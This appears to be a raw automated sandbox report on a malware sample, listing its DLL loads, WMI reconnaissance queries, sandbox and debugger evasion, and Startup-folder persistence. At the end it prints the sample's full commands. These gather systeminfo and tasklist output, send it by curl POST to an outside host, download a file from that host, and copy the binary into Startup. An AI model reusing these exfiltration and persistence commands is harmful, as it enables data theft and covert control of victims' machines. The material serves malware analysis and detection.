Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\systeminfo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\curl.exeFile written: C:\Users\user\AppData\Local\Temp\tmp.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001E42DE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00200A76 push ecx; ret 0_2_00200A89
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00560A76 push ecx; ret 20_2_00560A89
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_001FF98E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00271C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00271C41
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0055F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_0055F98E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,20_2_005D1C41
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\file.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-95960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 6530Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeWindow / User API: threadDelayed 5498Jump to behavior
Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.2 %
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeAPI coverage: 4.1 %
Source: C:\Users\user\Desktop\file.exe TID: 4332Thread sleep time: -65300s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe TID: 3568Thread sleep count: 5498 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe TID: 3568Thread sleep time: -54980s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\file.exeThread sleep count: Count: 6530 delay: -10Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeThread sleep count: Count: 5498 delay: -10Jump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0024D3A9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0024DBBE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0021C2A2 FindFirstFileExW,0_2_0021C2A2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002568EE FindFirstFileW,FindClose,0_2_002568EE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0025698F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0024D076
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00259642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00259642
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0025979D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00259B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00259B2B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00255C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00255C97
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_005AD3A9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,20_2_005ADBBE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0057C2A2 FindFirstFileExW,20_2_0057C2A2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B68EE FindFirstFileW,FindClose,20_2_005B68EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,20_2_005B698F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_005AD076
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_005B9642
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_005B979D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,20_2_005B9B2B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B5C97 FindFirstFileW,FindNextFileW,FindClose,20_2_005B5C97
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001E42DE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
Source: curl.exe, 0000000C.00000003.2275643983.00000000032F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: curl.exe, 00000009.00000003.2241791750.0000000003060000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2244193304.0000000003063000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: curl.exe, 00000007.00000003.2207063543.0000000003089000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.2209366991.0000000003089000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2205956694.00000000030CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2206873585.0000000003088000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2205956694.00000000030C7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403837069.00000000030EF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403483111.0000000003124000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403483111.000000000312B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403796126.00000000030EA000.00000004.00000020.00020000.00000000.sdmp, tmp.txt.1.drBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: curl.exe, 00000007.00000003.2207063543.0000000003080000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.2300660489.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403796126.00000000030E1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000003.2428836620.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000003.2454053246.0000000003741000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000003.2481341796.0000000003321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025EAA2 BlockInput,0_2_0025EAA2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00212622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00212622
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001E42DE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00204CE8 mov eax, dword ptr fs:[00000030h]0_2_00204CE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00564CE8 mov eax, dword ptr fs:[00000030h]20_2_00564CE8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00240B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00240B62
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00212622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00212622
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0020083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0020083F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002009D5 SetUnhandledExceptionFilter,0_2_002009D5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00200C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00200C21
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00572622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00572622
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0056083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0056083F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005609D5 SetUnhandledExceptionFilter,20_2_005609D5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00560C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00560C21
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00241201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00241201
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00222BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00222BA5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024B226 SendInput,keybd_event,0_2_0024B226
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_002622DA
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txtJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" Jump to behavior
